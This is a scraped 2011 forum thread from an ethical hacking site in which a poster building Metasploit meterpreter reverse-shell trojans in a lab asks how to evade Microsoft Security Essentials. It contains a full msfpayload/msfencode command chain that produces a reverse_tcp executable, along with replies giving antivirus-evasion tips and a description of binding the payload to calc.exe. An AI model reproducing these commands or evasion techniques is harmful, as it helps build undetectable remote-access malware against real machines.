Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.






Lost Password?
No account yet? Register
Who's Online
We have 106 guests online
EH-Net News Feeds
Latest Additions
 
Advertisement

You are here: Home arrow Forum arrow Ethical Hacking Discussions and Related Certificationsarrow Network Pen Testingarrow msfencode
EH-Net
May 26, 2012, 11:25:55 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Advertise on EH-Net!! - Reasonable Rates, Highly Targeted Audience.
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
  Print  
Author Topic: msfencode  (Read 2266 times)
0 Members and 1 Guest are viewing this topic.
acidicloop
Newbie
*
Offline Offline

Posts: 7


View Profile
« on: November 29, 2011, 12:39:35 AM »

Hello again. Ive been making some trojans with msfpayload and have been messing with msfencode. The trojan has worked great dropping the meterpreter shell, however, for the life of me I cannot get it past microsoft security essential antivirus. No matter what I do, it flags it. My code is this:
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.146.139 lport=4442 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > chucknorris.exe and I usually run an apache server and connect to it from the xp machine and download the trojan, or I do shared folders in VM. Any tricks yall know to bypass security essentials? I would think two counts of 10 a piece and shikata_ga_nai would do the trick, but alas it does not.
Logged
j0rDy
Hero Member
*****
Offline Offline

Posts: 578


View Profile
« Reply #1 on: November 29, 2011, 06:59:31 AM »

pff, this is not easy, i'd say you have two options. now please correct me if i'm wrong, i have no experience with this whatsoever!

first thing you could to to evade antivirus is make sure the code is different so it will not match the signature of the antivirus. You can do this by adding characters that may not be used. you can use the following parameter for this:     -b   The list of characters to avoid: 'x00xff'

another option would be to obfuscate the code or to attach the code to another executable, but i dont have any examples on that.

you probably already seen this one? http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass
Logged

ISC2 Associate, CEH, OSCP, OSWP

earning my stripes appears to be a road i must travel alone...with a little help of EH.net
3xban
Sr. Member
****
Offline Offline

Posts: 373


View Profile
« Reply #2 on: November 29, 2011, 07:25:29 AM »

I've noticed that MSE is pretty darn good at catching these customized trojans.  I had it catch the PDF exploit for cool type almost instantly.  I've had it also pick up traffic from an exploited website before other AV products did (SEP, ESET, AVG).  I have no idea why people would be upset with a company who designed an OS to use their own built in AV.  One would think who would know their system better than the creator of that system.

You may have to get creative with bypassing MSE.
Logged

Certs: GCWN
chrisg
Guest
« Reply #3 on: November 29, 2011, 08:13:49 AM »

here are a couple of links that may help

http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/

http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/

this thread from msf mailing list
http://mail.metasploit.com/pipermail/framework/2011-April/007630.html
Logged
cd1zz
Sr. Member
****
Offline Offline

Posts: 393


View Profile WWW
« Reply #4 on: November 29, 2011, 09:01:24 AM »

Another resource http://schierlm.users.sourceforge.net/avevasion.html
Logged

acidicloop
Newbie
*
Offline Offline

Posts: 7


View Profile
« Reply #5 on: November 29, 2011, 09:57:48 AM »

Thanks for the links. Glad to know, its not just my issue, lol. Now I thought shikata_ga_nai was polymorphic? curious why that wouldnt evade SE, unless like the article said, SE bases it off templates. I even did a trick where I uploaded the trojan, ran iexpress and made a self extracting executable by attaching it to calculator, so that when they closed out calc after use, it ran the meterpreter reverse_tcp. But it flagged that too and under the properties of the trojaned calc its even  signed by microsoft,lol
Logged
Pages: [1]   Go Up
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2011, Simple Machines
Joomla Bridge by JoomlaHacks.com
Valid XHTML 1.0! Valid CSS!
Page created in 0.213 seconds with 22 queries.
 

gk_static-ad_feb2012.jpg
Global Knowledge: Build Security Skills to Protect & Defend

els_130x200fixed2.gif
eLearnSecurity Student Course Now Live!
5% Off with Code
ELS-EH-5

SANS Deals 4 EH-Netters
$150 OFF Any SANS Course in Any Format!
Coupon Code: EHN_Connect Including SANS Security West 2012 & SANSFIRE 2012
Recent Forum Topics

cbtnuggets_logo_125.jpg
Try CBT Nuggets Free!

Vote For EH-Net

Add to Technorati Favorites
technorati fave

 
         
Advertisement

© 2012 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.